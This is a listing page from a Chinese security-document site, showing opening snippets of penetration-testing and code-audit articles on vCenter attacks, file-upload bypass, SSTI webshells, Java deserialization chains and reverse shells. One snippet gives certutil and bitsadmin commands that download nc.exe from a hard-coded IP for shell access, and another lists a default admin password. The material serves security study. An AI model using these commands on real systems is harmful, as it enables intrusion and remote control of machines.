爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

nbcio-boot代码审计之JS注入攻守道

# nbcio-boot代码审计之JS注入攻守道 - 漏洞分析与防御策略 ## 一、项目基本信息 - **项目地址**: https://gitee.com/nbacheng/nbcio-boot.git - **默认凭证**: admin/123456 ## 二、漏洞概述该系统存在JavaScript表达式注入漏洞，攻击者可通过构造特殊POC绕过现有防御机制，实现任意代码执行。 ## 三、漏洞分析 ### 1. 初始漏洞初始版本存在直接通过JavaScript调用Java类执

2025-08-20 21:03:57

实战|内网中vcenter集群攻击全程实录，学会你也行！

# 内网中vCenter集群攻击全程实录 ## 攻击概述本文详细记录了针对内网环境中vCenter集群的完整攻击过程，涵盖从初始信息收集到最终获取集群控制权的各个关键步骤。 ## 攻击流程 ### 1. 信息收集阶段 1. **网络拓扑探测** - 使用nmap进行内网扫描，识别vCenter服务器IP - 确认vCenter版本信息：`nmap -sV -p 443 ` - 检查开放端口，重点关注443(HTTPS)、5480(管理界面)、427(服务定位协议)

2025-08-20 21:02:37

OAuth 2.0标准下的身份验证漏洞

# OAuth 2.0身份验证漏洞详解与防御指南 ## 1. OAuth 2.0概述 OAuth 2.0是一种广泛使用的授权框架，允许网站和应用程序请求访问用户在另一应用程序中的账户有限权限，而无需暴露用户凭据。 ### 关键特点： - 允许用户精确控制共享的数据范围 - 不向第三方应用暴露登录凭据 - 当前行业标准（区别于已淘汰的OAuth 1.0a） ## 2. OAuth 2.0核心组件 1. **客户端应用程序**：请求访问用户数据的网站或应用 2. **资源所有者**：拥有被

2025-08-20 20:51:38

Burp Suite API插件开发指北 | Part 3 篡改WebSocket报文

# Burp Suite API插件开发指南：篡改WebSocket报文 ## 1. 背景与概述 WebSocket协议相比HTTP具有更低的传输开销，广泛应用于即时聊天、在线游戏、实时位置等低延迟、高并发的服务场景。随着Burp Suite新版本对WebSocket的支持，开发者现在可以通过API插件来拦截和篡改WebSocket报文。 ## 2. 模拟场景本教程基于一个GoLang编写的简易聊天室项目，该场景具有以下特点： - 前端使用JavaScript计算消息的SHA-256哈

2025-08-20 20:50:45

基于本地大模型的敏感信息检测的burp插件开发

# 基于DeepSeek本地大模型的BurpSuite敏感信息检测插件开发指南 ## 一、开发背景与概述在渗透测试过程中，传统的敏感信息检测方法（如正则表达式匹配）存在以下问题： - 覆盖率低：难以覆盖所有可能的敏感信息格式 - 误报率高：无法理解上下文语义，导致大量误报 - 维护成本高：需要不断更新规则库本方案利用本地部署的大语言模型(DeepSeek/Ollama)结合BurpSuite扩展开发技术，实现智能化的敏感信息检测，具有以下优势： - 语义理解能力：能理解上下文，减少误报

2025-08-20 20:49:39

flaskpython代码审计思路及实战记录

# Flask Python代码审计全面指南 ## 1. SQL注入审计与防御 ### 1.1 危险模式识别 - 使用字符串拼接方式构造SQL语句： ```python "SELECT * FROM table WHERE id=" + value "SELECT * FROM table WHERE id=%s" % value "SELECT * FROM table WHERE id={0}".format(value) ``` - SQLAlchemy的`text

2025-08-20 20:48:11

文件上传通关攻略

# 文件上传漏洞全面攻防指南 ## 1. 基础测试流程 1. 创建一个PHP测试文件，内容包含攻击语句 2. 上传该PHP文件到目标服务器 3. 访问上传文件的路径 4. 使用中国蚁剑等工具进行连接测试 ## 2. 前端校验绕过技术 ### 2.1 文件后缀校验绕过 **方法1：Burp Suite拦截修改** - 先上传合法后缀文件（如.png） - 使用Burp Suite抓包 - 修改文件后缀为.php等可执行格式 **方法2：禁用JavaScript** - 直接禁用浏览器J

2025-08-20 20:46:46

抓包技术->APP|小程序|PC应用|WEB&转发联动&HTTPS协议

# 抓包技术全面指南：网站、小程序、APP与模拟器抓包 ## 前言本教程系统性地介绍了多种抓包技术，涵盖浏览器、微信、安卓APP等不同平台的抓包方法，以及流量转发等高级技术。教程基于小迪安全2024年课程内容整理，结合实践验证，适合网络安全初学者和渗透测试人员学习参考。 ## 工具准备 1. **MuMu模拟器**（或其他安卓模拟器如逍遥模拟器） 2. **Burp Suite**（简称BP） 3. **Charles**（茶杯） 4. **Fiddler** 5. **Proxifi

2025-08-20 20:45:44

记一次邮件钓鱼实例分析

# 邮件钓鱼实例分析与防御指南 ## 一、钓鱼邮件概述钓鱼邮件是一种常见的网络攻击手段，攻击者通过伪装成可信来源的电子邮件，诱导受害者点击恶意链接、下载有害附件或泄露敏感信息。根据攻击方式不同，钓鱼邮件可分为： 1. 附件钓鱼 - 包含恶意附件 2. 链接钓鱼 - 包含恶意链接 3. 二维码钓鱼 - 包含恶意二维码 4. 内容钓鱼 - 通过精心设计的内容诱导用户 ## 二、实例分析 ### 1. 发件人信息分析 **关键检查点：** - 发件人名称：`信息部`（需确认组织内是否有此

2025-08-20 20:44:51

Flask和Tornado的SSTI内存马注入技术研究

# Flask和Tornado的SSTI内存马注入技术研究 ## 0x00 前言本文详细研究Python SSTI(Server-Side Template Injection)漏洞在Flask和Tornado框架中的利用技术，特别是如何注入内存马(内存Webshell)并进行图形化管理。通过分析实际攻击案例，探索了多种绕过WAF的方法，并实现了与中国蚁剑的集成。 ## 0x01 Flask SSTI基础研究 ### 漏洞环境搭建 Flask SSTI漏洞通常出现在直接将用户输入拼接

2025-08-20 20:44:03

JAVA安全-cc2分析（进阶篇）

# Java安全 - CC2链分析（进阶篇） ## 前言本教程详细分析Commons Collections 2（CC2）链及其变种YSO-CC2的利用方式，相比CC1链难度更高，需要掌握更多前置知识。 ## 前置知识 ### ClassLoader `ClassLoader`是Java类加载器，其中的`defineClass`方法可以将字节码还原为Class对象。关键方法： - `defineClass(String name, byte[] b, int off, int l

2025-08-20 20:42:32

反弹SHELL&不回显外带&正反向连接&防火墙出入站&文件下载

# 反弹SHELL与不回显外带技术详解 ## 一、无图形化文件上传下载 ### 1.1 文件上传方法 - 将文件(如nc.exe)上传到服务器网站根目录下 - 通过URL访问(如47.94.236.117/nc.exe)默认会触发下载 ### 1.2 Windows命令行下载方法 ``` certutil -urlcache -split -f http://47.94.236.117/nc.exe nc.exe bitsadmin /transfer download /download

2025-08-20 20:41:09

跳转到页